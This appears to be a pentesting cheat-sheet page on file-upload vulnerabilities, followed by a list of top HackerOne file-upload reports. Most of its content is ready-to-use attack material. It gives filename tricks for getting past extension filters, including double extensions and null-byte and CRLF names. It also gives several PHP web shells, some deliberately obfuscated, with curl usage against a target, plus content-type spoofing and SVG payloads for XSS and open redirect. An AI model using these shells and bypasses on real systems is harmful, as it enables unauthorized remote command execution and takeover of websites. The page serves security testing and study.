File-Upload

File extension

# extension blacklisted:
PHP: .phtm, phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc
ASP: .asp, .aspx, .cer, .asa
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion: .cfm, .cfml, .cfc, .dbm
Using random capitalization: .pHp, .pHP5, .PhAr
pht,phpt,phtml,php3,php4,php5,php6,php7,phar,pgif,phtm,phps,shtml,phar,pgif,inc
# extension whitelisted:
file.jpg.php
file.php.jpg
file.php.blah123jpg
file.php%00.jpg
file.php\\x00.jpg
file.php%00
file.php%20
file.php%0d%0a.jpg
file.php.....
file.php/
file.php.\\
file.
.html

Payloads

<?php system($_GET["cmd"]);?> # ?cmd= (ex: ?cmd=ls -la")
<?=`$_GET[0]`?>               # ?0=command

<?=`$_POST[0]`?>          
# Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command"

<?=`{$_REQUEST['_']}`?>      
# Usage: http://target.com/path/to/shell.php?_=command OR curl -X POST http://target.com/path/to/shell.php -d "_=command" '

<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
# Usage : http://target.com/path/to/shell.php?0=command

<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>
# Usage : http://target.com/path/to/shell.php?_=function&__=argument http://target.com/path/to/shell.php?_=system&__=ls

Content type

- Preserve name, but change content-type
Content-Type: image/jpeg, image/gif, image/png

Content length

# Small bad code:
<?='$_GET[x]'?>

Impact by extension

asp, aspx, php5, php, php3: -->  webshell, rce
svg:                        --> stored xss, ssrf, xxe
gif:                        --> stored xss, ssrf
csv:                        --> csv injection
xml:                        --> xxe 
avi:                        --> lfi, ssrf
html, js:                   --> html injection, xss, open redirect
png, jpeg:                  --> pixel flood attack dos
zip:                        --> rce via lfi, dos
pdf, pptx:                  --> ssrf, blind xxe

File name

Other Test Cases

File Upload Exploitation

  • SVG file To XSS

    	<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
	<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
	<script type="text/javascript">
	alert("h0tak88r XSS");
	</script>
	</svg>

  • Open Redirect when uploading svg files

        <code>
    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <svg
    onload="window.location='<http://www.google.com>'"
    xmlns="<http://www.w3.org/2000/svg>">
    </svg>
    </code>

Top Upload reports from HackerOne:

  1. Remote Code Execution on www.semrush.com/my_reports on Logo upload to Semrush - 792 upvotes, $0

  2. Webshell via File Upload on ecjobs.starbucks.com.cn to Starbucks - 673 upvotes, $0

  3. Blind XSS on image upload to CS Money - 412 upvotes, $1000

  4. Unrestricted file upload on [ambassador.mail.ru] to Mail.ru - 404 upvotes, $3000

  5. [ RCE ] Through stopping the redirect in /admin/* the attacker able to bypass Authentication And Upload Malicious File to Mail.ru - 340 upvotes, $0

  6. Unrestricted file upload leads to Stored XSS to Visma Public - 268 upvotes, $250

  7. SSRF leaking internal google cloud data through upload function [SSH Keys, etc..] to Vimeo - 249 upvotes, $0

  8. Arbitrary File Upload to Stored XSS to Visma Public - 245 upvotes, $250

  9. Unrestricted File Upload Leads to RCE on mobile.starbucks.com.sg to Starbucks - 225 upvotes, $0

  10. Admin Management - Login Using Default Password - Leads to Image Upload Backdoor/Shell to Razer - 199 upvotes, $200

  11. External SSRF and Local File Read via video upload due to vulnerable FFmpeg HLS processing to TikTok - 139 upvotes, $2727

  12. Unrestricted file upload in www.semrush.com > /my_reports/api/v1/upload/image to Semrush - 124 upvotes, $0

  13. User can upload files even after closing his account to Basecamp - 114 upvotes, $0

  14. XXE Injection through SVG image upload leads to SSRF to Zivver - 112 upvotes, $0

  15. Insecure file upload in xiaoai.mi.com Lead to Stored XSS to Xiaomi - 107 upvotes, $0

  16. Unrestricted File Upload on https://partner.tiktokshop.com/wsos_v2/oec_partner/upload to TikTok - 98 upvotes, $0

  17. [insideok.ru] Remote Command Execution via file upload. to ok.ru - 94 upvotes, $0

  18. Avatar upload allows arbitrary file overwriting to Mail.ru - 88 upvotes, $750

  19. Unrestricted file upload leads to Stored XSS to GitLab - 82 upvotes, $0

  20. Unauthenticated user can upload an attachment to the last updated report draft to HackerOne - 80 upvotes, $0

  21. XSS from arbitrary attachment upload. to Qulture.Rocks - 74 upvotes, $0

  22. Open s3 bucket allows for public upload to Augur - 73 upvotes, $100

  23. SSRF and local file disclosure by video upload on https://www.redtube.com/upload to Pornhub - 61 upvotes, $500

  24. Cross site scripting via file upload in subdomain ads.tiktok.com to TikTok - 59 upvotes, $500

  25. Unrestricted file upload when creating quotes allows for Stored XSS to Visma Public - 57 upvotes, $250

  26. Singapore - Unrestricted File Upload Leads to XSS on campaign.starbucks.com.sg/api/upload to Starbucks - 57 upvotes, $0

  27. Stored XSS on upload files leads to steal cookie to Palo Alto Software - 56 upvotes, $0

  28. SSRF and local file disclosure by video upload on https://www.tube8.com/ to Pornhub - 53 upvotes, $500

  29. Unrestricted File Upload Results in Cross-Site Scripting Attacks to Uber - 53 upvotes, $0

  30. SSRF in VCARD photo upload functionality to Open-Xchange - 49 upvotes, $850

PreviousContact usNextInviting Feature

Last updated